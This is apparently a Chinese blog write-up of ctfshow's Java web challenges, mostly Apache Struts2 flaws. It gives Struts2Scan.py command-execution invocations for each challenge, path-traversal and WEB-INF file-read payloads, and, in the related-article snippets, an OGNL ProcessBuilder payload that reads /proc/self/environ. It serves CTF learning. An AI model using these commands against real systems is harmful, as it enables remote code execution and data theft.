ctfshow web入门 Java

最新推荐文章于 2024-08-08 23:29:55 发布
最新推荐文章于 2024-08-08 23:29:55 发布
阅读量611 收藏 20
点赞数 18
分类专栏: ctfshow 文章标签: java 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/139387988
版权

在这里插入图片描述好东西专打
全部题都是struts2框架漏洞
使用方法在md里面下载地址

web279

S2-001漏洞
先访问S2-001页面,然后用工具
在这里插入图片描述查看源代码发现链接

python Struts2Scan.py -u https://a60a1ecb-8dd1-48f7-86bc-dfe151d70225.challenge.ctf.show/S2-001/login.action

在这里插入图片描述

python Struts2Scan.py -u https://a60a1ecb-8dd1-48f7-86bc-dfe151d70225.challenge.ctf.show/S2-001/login.action -n S2-001 --exec

然后执行env命令

env 命令是一个用于显示系统环境变量的实用程序。它允许你查看当前 shell
的环境变量设置,或者在运行命令时临时修改环境变量。通常,它用于查看或更改与进程相关的环境变量,例如 PATH,HOME 等。
在这里插入图片描述

web280

一样的做法查看源代码发现
在这里插入图片描述在这里插入图片描述扫描以后发现S2-015

python Struts2Scan.py -u https://d212099d-35c3-4d24-8cbe-620eedddb33c.challenge.ctf.show/S2-005/example/HelloWorld.action -n S2-016 --exec

有两个漏洞但是最后只有S2-016才能命令执行

web281

python Struts2Scan.py -u https://9f922905-e0a8-41bb-9ac3-0d93ced12812.challenge.ctf.show/S2-007/user.action -n S2-016 --exec

web282

在这里插入图片描述在这里插入图片描述

姿势1:
python Struts2Scan.py -u https://74dce53a-d465-4735-b9c5-63ee3ebfe046.challenge.ctf.show/S2-008/cookie.action -n S2-016 --exec
姿势2:
下面这两个都行
python Struts2Scan.py -u https://74dce53a-d465-4735-b9c5-63ee3ebfe046.challenge.ctf.show/S2-008/devmode.action -n S2-016 --exec
python Struts2Scan.py -u https://74dce53a-d465-4735-b9c5-63ee3ebfe046.challenge.ctf.show/S2-008/devmode.action -n S2-devMode --exec

web283

在这里插入图片描述

python Struts2Scan.py -u https://eb329dd7-bb13-4437-8b37-af1a1f1f5380.challenge.ctf.show/S2-009/showcase.action -n S2-008 --exec

web284

python Struts2Scan.py -u https://40b3d021-4604-483b-bc99-656ce7e2c8c7.challenge.ctf.show/S2-012/user.action -n S2-016 --exec

web285

在这里插入图片描述

python Struts2Scan.py -u https://3a33e97d-4230-45a1-922f-95123743a2b8.challenge.ctf.show/S2-013/link.action -n S2-001 --exec

python Struts2Scan.py -u https://3a33e97d-4230-45a1-922f-95123743a2b8.challenge.ctf.show/S2-013/link.action -n S2-013 --exec

python Struts2Scan.py -u https://3a33e97d-4230-45a1-922f-95123743a2b8.challenge.ctf.show/S2-013/link.action -n S2-016 --exec

web286

python Struts2Scan.py -u https://09f723c9-d0cb-4ea1-9654-81d93e1a5405.challenge.ctf.show/S2-015/welcome.action -n S2-016 --exec

python Struts2Scan.py -u https://09f723c9-d0cb-4ea1-9654-81d93e1a5405.challenge.ctf.show/S2-015/welcome.action -n S2-045 --exec

有很多姿势,我试了一下基本都是上面这两个漏洞

web287

python Struts2Scan.py -u https://640840ba-1b73-466c-9f7d-8eeb50bae55f.challenge.ctf.show/S2-016/default.action -n S2-045 --exec

python Struts2Scan.py -u https://640840ba-1b73-466c-9f7d-8eeb50bae55f.challenge.ctf.show/S2-016/default.action -n S2-016 --exec

web288

python Struts2Scan.py -u https://e5127f3e-e1e6-4091-811a-f6811de222c2.challenge.ctf.show/S2-019/example/HelloWorld.action?request_locale=en -n S2-045 --exec

web289

python Struts2Scan.py -u https://b7de196d-532d-4e88-a3ce-d032c820eb09.challenge.ctf.show/S2-029/ -n S2-045 --exec

web290

python Struts2Scan.py -u https://31c024bb-0b84-449c-8c5f-6f761c8f2f33.challenge.ctf.show/S2-032/ -n S2-045 --exec

web291

python Struts2Scan.py -u https://1636cbbe-1126-46ea-a1f0-2bd4d0ac19a8.challenge.ctf.show/S2-033/orders -n S2-045 --exec

web292

python Struts2Scan.py -u https://24ec62e6-b7d5-4821-9bc2-e1bc603c6999.challenge.ctf.show/S2-037/orders -n S2-045 --exec

web293

python Struts2Scan.py -u https://f4a969e5-1e8b-4fda-bffd-c241e4176608.challenge.ctf.show/S2-045/orders -n S2-045 --exec

web294

在这里插入图片描述在这里插入图片描述
这里又学到了,他说不存在不代表不能进行命令执行,前面有一道是S2-062的我估计就是被骗了,应该是直接env就能有的

python Struts2Scan.py -u https://7c19c756-c0de-4fde-a57e-3aef648217d8.challenge.ctf.show/S2-046/doUpload.action -n S2-046 --exec

web295

这个用工具暂时打不通先欠着

web296

python Struts2Scan.py -u https://d3bc5c63-3e6e-4fdd-84ae-d89b8a442bea.challenge.ctf.show/S2-052/orders -n S2-045 --exec

web297

python Struts2Scan.py -u https://2e8af7c0-216b-4f43-a382-6023972a2442.challenge.ctf.show/S2-053/?name=VulApps+ -n S2-045 --exec

web298

下载一个软件进行反编译
最前比较好的
然后根据自己有没有jre来选链接
在这里插入图片描述

在这里插入图片描述

要使得user里面的getVipStatus为真就可以得到flag

在这里插入图片描述
但是不知道在于是扫后台
在这里插入图片描述然后直接传没有反应进入login页面

url/ctfshow/login?username=admin&password=ctfshow

web299

在这里插入图片描述
查看源代码发现这个任意文件读取漏洞
最后就是这样

/view-source?file=../../../../../fl3g

web300

?file=WEB-INF/web.xml

在这里插入图片描述
发现这个比较有可能是com.ctfshow.servlet.PhpServlet

?file=WEB-INF/classes/com/ctfshow/servlet/PhpServlet.class

欧克没找到flag重新回去看
com.ctfshow.servlet.GetFlag
还有这个

?file=WEB-INF/classes/com/ctfshow/servlet/GetFlag.class

然后解释一下这两道题

WEB-INF 目录中包含了以下两个重要的子目录:

WEB-INF/classes:用于存放编译后的类文件(.class 文件),这些类文件包含了 Servlet、Filter、Listener 等组件的实现代码。Servlet 容器会在启动时将这些类加载到内存中,并根据配置来处理客户端请求。

WEB-INF/lib:用于存放应用程序所需的依赖库(JAR 文件)。这些 JAR 文件中包含了你的应用程序所依赖的第三方库或者框架。Servlet 容器会在启动时将这些依赖库中的类加载到类路径中,以供应用程序使用。

除了这两个子目录外,WEB-INF 目录中通常还包含一个 web.xml 文件,用于配置 Web 应用程序的部署描述符(Deployment Descriptor)。web.xml 文件中包含了 Servlet、Filter、Listener 等组件的配置信息,以及一些应用程序级别的参数设置。

那么我们的思路就是在WEB-INF/web.xml去找类然后再去找flag
所以这就是?file=WEB-INF/classes/com/ctfshow/servlet/GetFlag.class为什么这么写的原因
然后我们找到了flag
为什么是五次返回上级目录才会出现flag呢这个数都数的出来flag是在五级目录下的,回到网页要五次,再不济多加几个返回上级目录../也无伤大雅

用脚本打的别忘了看原理浮现漏洞各位师傅(我现在去看了)

baozongwi
关注
专栏目录
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4532
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
2024年CTFSHOW-Web入门题解(更新中)
2401_84252743的博客
05-01 582
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
ctfshow web入门(java)
Blazing-Angel的博客
07-19 872
ctfshow
ctfshow web入门 java web279-283
m0_62207170的博客
04-22 530
ctfshow web入门 java web279-283
CTFSHOW web入门 java反序列化篇 web855
羽的博客
12-13 2068
ctfshow java反序列化
ctfshow java
SopRomeo的博客
01-27 1104
web279 这个编号有点奇怪,搜搜 漏洞讲解 里面有payload直接用,我不知道啥原因echo FLAG flag不出来 因为这是动态靶机,直接看/proc/self/environ %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/proc/self/environ"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 996
F12。
CTFshow 命令执行 web75
Kradress的博客
12-06 1242
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been dis
ctfshow-WEB入门-Part3-wp
F1rstb100d
10-04 153
ctfshow-WEB入门-Part3-wp
【CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 3533
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
[ctfshow]-web196
weixin_52116519的博客
03-06 401
解题 0;select(2) 2 原理
ctfshow-web入门-sql注入(web196-web200)堆叠注入
最新发布
Welcome To Myon'Blog !
08-08 543
这里把 create 和 drop 都过滤了,那么我们直接用 insert 插入来覆盖 pass 和 username 的值。其中 $row[0] 表示从数据库查询结果中提取的某一行的第一个字段值,我们可以使用 select 来设置$row[0] 的值,再提交我们设置的 password 满足两者相等,payload:还是堆叠注入,显示过滤了 select 实际并没有。
ctf_show web入门 sql篇 171-239
weixin_48083470的博客
07-23 1621
ctfshow web入门 sql篇 171 很简单直接联合查询 172 和第一题一样的查询语句,不过在显示内容时有过滤 过滤了flag " ' union select id,if(username='flag','a',username),password from ctfshow_user2 %23 可以在查询时将结果替换 即可 173差不多同上题 也有 like,regexp 正则匹配的方式 比较 内容 174 内容过滤了flag 和数字 直接查我查不出来 flag里肯定会有数字 选择布尔盲注
ctfshow学习记录-web入门(sql注入191-200)
龟速更新的九某人
01-11 1319
ctfshow学习记录-web入门(sql注入web191-web200)
ctfshow web入门 java 295 298-300
m0_64815693的博客
04-08 1402
ctfshow web入门 java 295 298-300
CTFSHOW JAVA
羽的博客
12-17 3817
WEB279-294 296-297 脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71 具体用法在md文件中,例如 检测 python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action 利用 python Struts2Scan.py -u http://94c4c47e-4f
CTFSHOW web入门 java反序列化篇(更新中)
羽的博客
12-07 5062
ctfshow web入门 java反序列化篇
Java漏洞复现(ctfshow279-297)strust 漏洞复现及原理解释
m0_74402888的博客
07-27 851
而由于struts2-struts1-plugin 包中的 “Struts1Action.java” 中的 execute 函数可以调用 getText() 函数,这个函数刚好又能执行OGNL表达式,同时这个 getText() 的 参数输入点,又可以被用户直接进行控制,如果这个点被恶意攻击者所控制,就可以构造恶意执行代码,从而实现一个RCE攻击。<s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。
CTFshow Java
starttv的博客
11-17 1698
OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上。通常tomcat的做法是解压,编译里面的代码,所以当文件很多的时候,tomcat的启动会很慢。
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1.了解Web基础知识,例如HTTP协议、HTML、CSS、JavaScript等。 2.学习Web漏洞,例如SQL注入、XSS、CSRF等。 3.掌握一些常用的Web工具,例如Burp Suite、sqlmap、dirbuster等。 4.多练习,多尝试,多思考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值